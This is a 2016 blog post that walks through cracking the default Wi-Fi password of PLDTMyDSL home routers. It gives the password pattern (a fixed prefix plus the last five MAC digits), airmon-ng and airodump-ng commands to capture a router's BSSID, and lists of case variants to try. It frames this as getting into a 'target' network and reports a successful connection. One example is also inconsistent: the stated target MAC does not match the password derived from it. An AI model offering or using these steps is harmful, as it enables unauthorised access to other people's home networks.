Hacking PLDTMyDSL Wifi

Cracking PLDTMyDSL default wifi password

Posted by Adones Pitogo on Mar 29, 2016

PLDTMyDSL is a common home router here in the Philippines. Most home owners don’t update their default router password thinking it’s already safe. Today I’m gonna show you how to crack the default wifi password of these routers.


The Pattern

The default wifi password of PLDTMyDSL routers have a pattern pldtwifi<last 5 MAC digits>, either in uppercase or lowercase. Examples:

  • PLDTWIFI83312
  • PLDTWIFI66ABC
  • pldtwifi8F10C

Now, if you are lucky and your target hasn’t changed it’s default password, you can easily connect to it by trying several combinations following the above pattern.

Let’s start!

Getting the router’s MAC address

First, we need to get the MAC address of the router. There are several ways to do this but I’m only gonna show the one I’m most familiar of, using Aircrack-ng’s airodump-ng tool. Assuming you are using Kali Linux, this tool is readily available for you.

Note: If you are on Arch Linux (perhaps this could also work on other distros like Ubuntu), you need to install aircrack-ng package first and then stop the NetworkManager and wpa_supplicant services:

$ sudo systemctl stop NetworkManager wpa_supplicant

Then switch your wireless card to monitor mode (# means you should run the command as root):

# airmon-ng check kill
# airmon-ng start wlan0

Then run airodump-ng:

# airodump-ng wlan0mon

Then you will see an output similar to this:

 CH  3 ][ Elapsed: 0 s ][ 2016-03-29 00:51                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 FC:8B:97:98:33:12  -71        5        0    0  11  54e  WPA2 CCMP   PSK  PLDTMyDSL                                                                  

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

The router’s MAC address is under BSSID, FC:8B:97:98:33:12 in this case.

Generate variants of password

Now that we have the MAC address of the router, we can now do the bruteforce attack. It’s very simple. We’ll just try to use variants of the default PLDTMyDSL password pattern (“pldtwifi+ last 5 digits of the MAC address”). Since my target’s MAC address is FC:8B:97:99:66:38, I can now form the password variants:

  • PLDTWIFI83312
  • pldtwifi83312

If you have letters in the last 5 digits of the MAC address, say FC:8B:97:99:C6:3A, you will probably have more password variants:

  • pldtwifi9c63a
  • pldtwifi9C63A
  • PLDTWIFI9c63a
  • PLDTWIFI9C63A

Connect to the wifi network

Now try to connect to the router using those passwords. If you are unable to connect, then probably the default password has already been changed. In my case, I was able to connect to the wifi network using the password pldtwifi83312.

Good luck!

Share: Email Twitter Facebook Google LinkedIn Reddit StumbleUpon Tumblr Buffer Digg